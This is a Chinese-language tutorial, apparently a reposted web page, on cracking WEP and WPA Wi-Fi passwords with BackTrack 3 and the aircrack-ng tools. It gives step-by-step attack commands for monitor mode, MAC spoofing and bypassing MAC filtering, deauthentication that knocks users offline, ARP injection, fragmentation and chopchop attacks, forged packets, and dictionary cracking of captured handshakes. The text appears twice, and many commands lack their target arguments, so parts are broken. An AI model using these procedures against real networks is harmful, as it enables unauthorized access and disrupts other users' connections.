2023年7月31日发(作者:)

Intel 3945 BT3破解无线WEP/WPA密码简明教程1

1.装备:三星Q35 无线网卡为Intel(R) PRO/Wireless 3945ABG

3 优盘版,解压bt3的iso文件到优盘,打开boot文件夹,运行,制作完毕。

下载最新的 和 软件放在BT3modules目录下

3.用U盘引导启动,直接打回车

4.启动后打开一个命令窗口,加载无线网卡驱动,因为BT3默认情况下不加载Intel 3945驱动。此步骤非常关键,否则得话扫描没有结果。(如果是atheros 的无线网卡可以自动加载驱动)。

modprobe -r iwl3945

modprobe ipwraw

注:不同的网卡有不同的加载方式

5:进入菜单backtrack—— radio network analysis ——80211——cracking ——spoonwep2

或者spoonwpa

6:netcard选择wifi0,device选择nomal,mode选择Unknown

7:具体用法如下:

频段建议全部扫描,如果有客户端后面的口里面会有√,选择一个power信号强度大的,packets多的客户端攻击,一般情况下默认设置就可以了。如果是wpa需要抓握手包,如果wep2的需要抓包到15000-30000不等才能破解密码,主要影响因素为信号强度和无线路由器使用的客户端的数据流的打小。

Intel3945 BT3 命令破解无线WEP/WPA密码教程2

本教程用于学习和交流,如要实验请拿自已的AP开刀!!

《BT3破解无线WEP/WPA教程》。

由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理

解的偏差甚至错误,希望各位朋友指正。

最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修

正和完善。

对无线WEP和WPA 破解有兴趣的朋友也可加入QQ一起交流。

谢谢!!

WEP破解

1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动

BT3 的盘符)

2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx)

3.加载3945 网卡的驱动。打开一个shell

输入 modprobe –r iwl3945

输入 modprobe ipwraw

注:不同的网卡有不同的加载方式

4. 查找目标:

用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能

连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR

值一般看出信号强度。也可以用airodump-ng wifi0 来搜索

我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。

注:修改自己网卡的MAC地址的命令。

输入macchanger –m 00:11:22:33:44:55 wifi0

5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11

信道)

输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。

可用aireplay-ng --test wifi0 来测试是否可以注入

6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为)

输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,

(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)

(其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改)

一. 有客户端WEP 破解

1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。

思路:1-6步同上

7.直接用aircrack-ng破解

第七步: aircrack-ng -n 64 -b

2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。

只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送

同样的arp请求包,来进行注入式攻击。

思路:1-6步同上

7.用aireplay-ng的arp注入方式获得大量的ivs

第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0

注:这一步可能时间会长一点,因为需要等到ARP。

3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功

思路:1-6步同上

7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接

8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0

第八步:aireplay-ng -0 10 –a -c <合法客户端 mac> wifi0

4.有客户端,并且客户端能产生有效arp 数据的另类破解方式

前面的步骤一样:

输入 modprobe –r iwl3945

输入 modprobe ipwraw

输入airmon-ng start wifi0 11

现在,只要一个命令就搞定,输入:

输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。

很简单吧,密码出来了。

二.无客户端WEP破解

思路:1-6步同上

因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。 这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP

将忽略所有从你网卡发送的数据包,IVS数据将不会产生。

第七步:输入 aireplay-ng -1 0 -e -a -h wifi0

如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:

1、目标AP做了MAC地址过滤

2、你离目标AP物理距离太远

3、对方使用了WPA加密

5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道

也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上

tcpdump -n -e -s0 -vvv -i wifi0

1.第一种破解方式:

思路:1-7步同上

建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发攻击包三种能力。

第八步:抓包,提数据和发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0

发包成功后可得到足够的ivs,然后用aircrack-ng破解。

成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet,按y 然后开始

发包攻击,date飞快涨。当获得足够的ivs以后就可破解了。

2.第二种破解方式:

思路:1-7步同上

第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)

第九步:然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包,

第十步:最后利用交互式攻击模式-2发包攻击。

第八步:采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。

输入aireplay-ng -5 -b -h wifi0

如顺利,将得到一个可利用的数据包如上图,系统将回显 Use this packet ? 输入y 回车,将得到一个至

关重要的xor 文件。

再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

第九步:用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。

输入packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255

-y

name-xor -w myarp

参数说明:

-y (filename)是用来读取PRGA的文件

-w (filename)将arp包写入文件,我用的文件名是myarp

系统回显:Wrote packet to: mrarp

第十步:采用交互模式-2,发包注入攻击。

输入aireplay-ng -2 –r myarp -x 256 rausb0

-y

【-r】:从指定文件中读取arp数据包

【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024

输入y 回车 攻击开始

这时,前面的抓包窗口上的data 将迅速增加。

到数据增加到1.5万以上时。

第十一步:采用aircrack-ng 来进行破解

3.第三种破解方式:

思路:1-7步同上

第八步:利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)

第九步:通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包

第十步:最后利用交互式攻击模式-2发包攻击。

第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件

输入aireplay-ng -4 -b -h wifi0

参数说明:

-b:设置需要破解的AP的mac

-h:设置用于连接的无线网卡的mac(自己网卡)

顺利将得到一个可利用的数据包,按y 将利用此数据包生产一个xor 文件

如上图所示得到一个名为replay_dec-0523-075615的xor 文件,

第九步:通过数据包制造程序Packetforge-ng提取上面xor 文件来伪造一个arp包

输入packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255

name-xor -w myarp

如上图,成功生成一个名为myarp的可用来注入的arp数据包。

第十步:最后利用交互式攻击模式-2发包攻击。

输入aireplay-ng -2 -r myarp rausb0

发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨

破 解 WPA

1、加载无线网卡驱动

2、设置网卡为在指定的ap 的工作频道的监控模式

这两部与前面相同

3、 输入截取数据包命令(截取11信道的cap 数据包,并保存名为)

输入命令 airodump-ng -w 12345 -c 11 wifi0 ,

(-w:写入文件,-c:截取cap的信道)

(其中12345 是获取的cap的保存文件的名字, 11是channel值,你根据实际修改。)

回车后可以看到是WPA-TIKP-PSK 加密方式

4、进行-0的Deauth验证攻击

这里为了便于WPA握手验证包的获取,必须进行Deauth验证攻击,这个对于采用WPA验证的AP攻击都

会用到,可以迫使AP重新与已连接的合法客户端进行握手验证,重新握手验证过程中获得验证数据包。

输入: aireplay-ng -0 10 -a wifi0

或者输入:aireplay-ng -0 10 -a -c wifi0

解释:-0 指的是采取Deautenticate 攻击方式,后面为发送次数。-c 建议还是使用,效果会更好,这个后面 跟的是监测到的合法的已连接的客户端MAC地址,如上图中显示的。

这里注意,Deauth 攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行,需要说明的是,攻击

期间很可能会导致该AP的其它无线客户端无法正常上网即断网频繁,而且对于一些低端AP可能会导致其

无线功能假死,无法ping通,需重起。

是否获得包含WPA 握手验证包的Cap文件,需要在破解时进行验证,以上Deauth 攻击几次后可以做破解

尝试。WPA破解不用等到数据Data 达到几万,因为它只要一个包含WPA握手验证包就可以了,通过上面

的方法我们已经获得破解WPA 所需的cap文件。即可进行下一步的破解。

5、用得到的CAP 数据包以后进行WPA 破解

破解方式一:用Cap数据包直接暴力破解

从破解难度上讲WEP 是很容易破解的,只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要

有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。

1、WEP 数据Cap破解

输入:aircrack-ng -z –b 12345*.cap

12345 是步骤3 中输入的cap的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,

系统会自动分成几个文件存储并自动命名,可以使用ls查看),输入12345*是打开所有1234 相关的cap文

件。

常见问题:步骤3中收集数据包已达30W,无法破解密码。可能系统自动分成了几个文件贮存cap包。

如输入 破解可能导致破解不成功,建议使用name*.cap 选择所有的cap

包进行破

解。

破解方式二:WPA 数据Cap破解

输入:aircrack-ng –w –b 12345*.cap

(-w:是字典破解模式)

是你事先准备好的字典。WPA密码破解必须使用字典破解模式。

技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root

下(aircrack 默认

的工作目录在/root)。

请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。也可

以把CAP数据包拷贝出来在WIN下用WinAircrack 破解。

注意点:

针MAC 地址过滤问题: 因为AP 只回应认证的的客户端. 用airodump-ng 搜索到刚刚连接上AP的

MAC地址,把自己的修改为这个MAC地址,就可以突破MAC地址过滤的 。

Aireplay-ng的6种攻击模式详解

-0 Deautenticate 冲突模式 使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,

从而产生有效ARP request。

如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARP

request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a -c wifi0

参数说明:

【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上

网)

【-a】:设置ap的mac

【-c】:设置已连接的合法客户端的mac。如果不设置-c,则断开所有和ap连接的合法客户端。

aireplay-ng -3 -b -h wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和AP进行连接。

这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。

为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发

送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注

入命令后才可反馈数据从而产生ARP包。

aireplay-ng -1 0 –e -a -h wifi0

参数说明:

【-1】:伪装客户端连接模式,后面跟延时

【-e】:设置ap的essid

【-a】:设置ap的mac

【-h】:设置伪装客户端的网卡MAC(即自己网卡mac)

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式

1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0

参数说明:

【-2】:交互攻击模式

【-p】设置控制帧中包含的信息(16进制),默认采用0841

【-c】设置目标mac地址

【-b】设置ap的mac地址

【-h】设置伪装客户端的网卡MAC(即自己网卡mac)

2.提取包,发送注入数据包

aireplay-ng -2 –r -x 1024 wifi0

发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。 -3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程

这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客

户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP

request 才可利用-3

模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和

ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。

如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生

有效ARP request。再通过-3模式注入。

aireplay-ng -3 -b -h -x 512 wifi0

参数说明:

【-3】:arp注入攻击模式

【-b】:设置ap的mac

【-h】:设置

【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)

-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件

这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新

的数据包以便我们可以进行注入。

aireplay-ng -4 -b -h wifi0

参数说明:

-b:设置需要破解的AP的mac

-h:设置虚拟伪装连接的mac(即自己网卡的mac)

-5 fragment碎片包攻击模式 用以获得PRGA(包含密钥的后缀为xor 的文件)

这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是

用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播

时,一个新的IVS将产生,我们就是利用这个来破解

aireplay-ng -5 -b -h wifi0

【-5】:碎片包攻击模式

【-b】:设置ap的mac

【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)

Packetforge-ng:数据包制造程序

Packetforge-ng

Mode

【-0】:伪造ARP包

packetforge-ng -0 -a -h wifi0 –k 255.255.255.255 -l 255.255.255.255

–y<.xor file> -w mrarp

参数说明:

【-0】:伪装arp数据包

【-a】:设置ap的mac

【-h】设置虚拟伪装连接的mac(即自己的mac)

【-k】说明:设置目标文件IP和端口

【-l】说明:设置源文件IP和端口

【-y】说明:从xor 文件中读取PRGA。后面跟xor 的文件名。

【-w】设置伪装的arp包的文件名

Aircrack-ng:WEP 及 WPA-PSK key 破解主程序

Aircrack-ng [optin] <.cap/.ivs file>

Optin

aircrack-ng -n 64 -b

参数说明:

【-n】:设置WEP KEY 长度(64/128/152/256/512)

aircrack-ng -x -f 2

参数说明:

【-x】:设置为暴力破解模式

【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2

aircrack-ng -w

【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包 文件。

2023年7月31日发(作者:)

Intel 3945 BT3破解无线WEP/WPA密码简明教程1

1.装备:三星Q35 无线网卡为Intel(R) PRO/Wireless 3945ABG

3 优盘版,解压bt3的iso文件到优盘,打开boot文件夹,运行,制作完毕。

下载最新的 和 软件放在BT3modules目录下

3.用U盘引导启动,直接打回车

4.启动后打开一个命令窗口,加载无线网卡驱动,因为BT3默认情况下不加载Intel 3945驱动。此步骤非常关键,否则得话扫描没有结果。(如果是atheros 的无线网卡可以自动加载驱动)。

modprobe -r iwl3945

modprobe ipwraw

注:不同的网卡有不同的加载方式

5:进入菜单backtrack—— radio network analysis ——80211——cracking ——spoonwep2

或者spoonwpa

6:netcard选择wifi0,device选择nomal,mode选择Unknown

7:具体用法如下:

频段建议全部扫描,如果有客户端后面的口里面会有√,选择一个power信号强度大的,packets多的客户端攻击,一般情况下默认设置就可以了。如果是wpa需要抓握手包,如果wep2的需要抓包到15000-30000不等才能破解密码,主要影响因素为信号强度和无线路由器使用的客户端的数据流的打小。

Intel3945 BT3 命令破解无线WEP/WPA密码教程2

本教程用于学习和交流,如要实验请拿自已的AP开刀!!

《BT3破解无线WEP/WPA教程》。

由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理

解的偏差甚至错误,希望各位朋友指正。

最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修

正和完善。

对无线WEP和WPA 破解有兴趣的朋友也可加入QQ一起交流。

谢谢!!

WEP破解

1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动

BT3 的盘符)

2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx)

3.加载3945 网卡的驱动。打开一个shell

输入 modprobe –r iwl3945

输入 modprobe ipwraw

注:不同的网卡有不同的加载方式

4. 查找目标:

用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能

连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR

值一般看出信号强度。也可以用airodump-ng wifi0 来搜索

我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。

注:修改自己网卡的MAC地址的命令。

输入macchanger –m 00:11:22:33:44:55 wifi0

5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11

信道)

输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。

可用aireplay-ng --test wifi0 来测试是否可以注入

6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为)

输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,

(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)

(其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改)

一. 有客户端WEP 破解

1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。

思路:1-6步同上

7.直接用aircrack-ng破解

第七步: aircrack-ng -n 64 -b

2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。

只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送

同样的arp请求包,来进行注入式攻击。

思路:1-6步同上

7.用aireplay-ng的arp注入方式获得大量的ivs

第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0

注:这一步可能时间会长一点,因为需要等到ARP。

3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功

思路:1-6步同上

7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接

8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

第七步:aireplay-ng -3 -b -h <合法客户端 mac> wifi0

第八步:aireplay-ng -0 10 –a -c <合法客户端 mac> wifi0

4.有客户端,并且客户端能产生有效arp 数据的另类破解方式

前面的步骤一样:

输入 modprobe –r iwl3945

输入 modprobe ipwraw

输入airmon-ng start wifi0 11

现在,只要一个命令就搞定,输入:

输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。

很简单吧,密码出来了。

二.无客户端WEP破解

思路:1-6步同上

因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。 这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP

将忽略所有从你网卡发送的数据包,IVS数据将不会产生。

第七步:输入 aireplay-ng -1 0 -e -a -h wifi0

如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:

1、目标AP做了MAC地址过滤

2、你离目标AP物理距离太远

3、对方使用了WPA加密

5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道

也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上

tcpdump -n -e -s0 -vvv -i wifi0

1.第一种破解方式:

思路:1-7步同上

建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发攻击包三种能力。

第八步:抓包,提数据和发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0

发包成功后可得到足够的ivs,然后用aircrack-ng破解。

成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet,按y 然后开始

发包攻击,date飞快涨。当获得足够的ivs以后就可破解了。

2.第二种破解方式:

思路:1-7步同上

第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)

第九步:然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包,

第十步:最后利用交互式攻击模式-2发包攻击。

第八步:采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。

输入aireplay-ng -5 -b -h wifi0

如顺利,将得到一个可利用的数据包如上图,系统将回显 Use this packet ? 输入y 回车,将得到一个至

关重要的xor 文件。

再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

第九步:用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。

输入packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255

-y

name-xor -w myarp

参数说明:

-y (filename)是用来读取PRGA的文件

-w (filename)将arp包写入文件,我用的文件名是myarp

系统回显:Wrote packet to: mrarp

第十步:采用交互模式-2,发包注入攻击。

输入aireplay-ng -2 –r myarp -x 256 rausb0

-y

【-r】:从指定文件中读取arp数据包

【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024

输入y 回车 攻击开始

这时,前面的抓包窗口上的data 将迅速增加。

到数据增加到1.5万以上时。

第十一步:采用aircrack-ng 来进行破解

3.第三种破解方式:

思路:1-7步同上

第八步:利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)

第九步:通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包

第十步:最后利用交互式攻击模式-2发包攻击。

第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件

输入aireplay-ng -4 -b -h wifi0

参数说明:

-b:设置需要破解的AP的mac

-h:设置用于连接的无线网卡的mac(自己网卡)

顺利将得到一个可利用的数据包,按y 将利用此数据包生产一个xor 文件

如上图所示得到一个名为replay_dec-0523-075615的xor 文件,

第九步:通过数据包制造程序Packetforge-ng提取上面xor 文件来伪造一个arp包

输入packetforge-ng -0 -a -h -k 255.255.255.255 –l 255.255.255.255

name-xor -w myarp

如上图,成功生成一个名为myarp的可用来注入的arp数据包。

第十步:最后利用交互式攻击模式-2发包攻击。

输入aireplay-ng -2 -r myarp rausb0

发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨

破 解 WPA

1、加载无线网卡驱动

2、设置网卡为在指定的ap 的工作频道的监控模式

这两部与前面相同

3、 输入截取数据包命令(截取11信道的cap 数据包,并保存名为)

输入命令 airodump-ng -w 12345 -c 11 wifi0 ,

(-w:写入文件,-c:截取cap的信道)

(其中12345 是获取的cap的保存文件的名字, 11是channel值,你根据实际修改。)

回车后可以看到是WPA-TIKP-PSK 加密方式

4、进行-0的Deauth验证攻击

这里为了便于WPA握手验证包的获取,必须进行Deauth验证攻击,这个对于采用WPA验证的AP攻击都

会用到,可以迫使AP重新与已连接的合法客户端进行握手验证,重新握手验证过程中获得验证数据包。

输入: aireplay-ng -0 10 -a wifi0

或者输入:aireplay-ng -0 10 -a -c wifi0

解释:-0 指的是采取Deautenticate 攻击方式,后面为发送次数。-c 建议还是使用,效果会更好,这个后面 跟的是监测到的合法的已连接的客户端MAC地址,如上图中显示的。

这里注意,Deauth 攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行,需要说明的是,攻击

期间很可能会导致该AP的其它无线客户端无法正常上网即断网频繁,而且对于一些低端AP可能会导致其

无线功能假死,无法ping通,需重起。

是否获得包含WPA 握手验证包的Cap文件,需要在破解时进行验证,以上Deauth 攻击几次后可以做破解

尝试。WPA破解不用等到数据Data 达到几万,因为它只要一个包含WPA握手验证包就可以了,通过上面

的方法我们已经获得破解WPA 所需的cap文件。即可进行下一步的破解。

5、用得到的CAP 数据包以后进行WPA 破解

破解方式一:用Cap数据包直接暴力破解

从破解难度上讲WEP 是很容易破解的,只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要

有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。

1、WEP 数据Cap破解

输入:aircrack-ng -z –b 12345*.cap

12345 是步骤3 中输入的cap的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,

系统会自动分成几个文件存储并自动命名,可以使用ls查看),输入12345*是打开所有1234 相关的cap文

件。

常见问题:步骤3中收集数据包已达30W,无法破解密码。可能系统自动分成了几个文件贮存cap包。

如输入 破解可能导致破解不成功,建议使用name*.cap 选择所有的cap

包进行破

解。

破解方式二:WPA 数据Cap破解

输入:aircrack-ng –w –b 12345*.cap

(-w:是字典破解模式)

是你事先准备好的字典。WPA密码破解必须使用字典破解模式。

技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root

下(aircrack 默认

的工作目录在/root)。

请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。也可

以把CAP数据包拷贝出来在WIN下用WinAircrack 破解。

注意点:

针MAC 地址过滤问题: 因为AP 只回应认证的的客户端. 用airodump-ng 搜索到刚刚连接上AP的

MAC地址,把自己的修改为这个MAC地址,就可以突破MAC地址过滤的 。

Aireplay-ng的6种攻击模式详解

-0 Deautenticate 冲突模式 使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,

从而产生有效ARP request。

如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARP

request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a -c wifi0

参数说明:

【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上

网)

【-a】:设置ap的mac

【-c】:设置已连接的合法客户端的mac。如果不设置-c,则断开所有和ap连接的合法客户端。

aireplay-ng -3 -b -h wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接

这种模式是伪装一个客户端和AP进行连接。

这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。

为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发

送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注

入命令后才可反馈数据从而产生ARP包。

aireplay-ng -1 0 –e -a -h wifi0

参数说明:

【-1】:伪装客户端连接模式,后面跟延时

【-e】:设置ap的essid

【-a】:设置ap的mac

【-h】:设置伪装客户端的网卡MAC(即自己网卡mac)

-2 Interactive 交互模式

这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式

1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b -h wifi0

参数说明:

【-2】:交互攻击模式

【-p】设置控制帧中包含的信息(16进制),默认采用0841

【-c】设置目标mac地址

【-b】设置ap的mac地址

【-h】设置伪装客户端的网卡MAC(即自己网卡mac)

2.提取包,发送注入数据包

aireplay-ng -2 –r -x 1024 wifi0

发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。 -3 ARP-request 注入攻击模式

这种模式是一种抓包后分析重发的过程

这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客

户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP

request 才可利用-3

模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和

ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。

如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生

有效ARP request。再通过-3模式注入。

aireplay-ng -3 -b -h -x 512 wifi0

参数说明:

【-3】:arp注入攻击模式

【-b】:设置ap的mac

【-h】:设置

【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)

-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件

这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新

的数据包以便我们可以进行注入。

aireplay-ng -4 -b -h wifi0

参数说明:

-b:设置需要破解的AP的mac

-h:设置虚拟伪装连接的mac(即自己网卡的mac)

-5 fragment碎片包攻击模式 用以获得PRGA(包含密钥的后缀为xor 的文件)

这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是

用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播

时,一个新的IVS将产生,我们就是利用这个来破解

aireplay-ng -5 -b -h wifi0

【-5】:碎片包攻击模式

【-b】:设置ap的mac

【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)

Packetforge-ng:数据包制造程序

Packetforge-ng

Mode

【-0】:伪造ARP包

packetforge-ng -0 -a -h wifi0 –k 255.255.255.255 -l 255.255.255.255

–y<.xor file> -w mrarp

参数说明:

【-0】:伪装arp数据包

【-a】:设置ap的mac

【-h】设置虚拟伪装连接的mac(即自己的mac)

【-k】说明:设置目标文件IP和端口

【-l】说明:设置源文件IP和端口

【-y】说明:从xor 文件中读取PRGA。后面跟xor 的文件名。

【-w】设置伪装的arp包的文件名

Aircrack-ng:WEP 及 WPA-PSK key 破解主程序

Aircrack-ng [optin] <.cap/.ivs file>

Optin

aircrack-ng -n 64 -b

参数说明:

【-n】:设置WEP KEY 长度(64/128/152/256/512)

aircrack-ng -x -f 2

参数说明:

【-x】:设置为暴力破解模式

【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2

aircrack-ng -w

【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包 文件。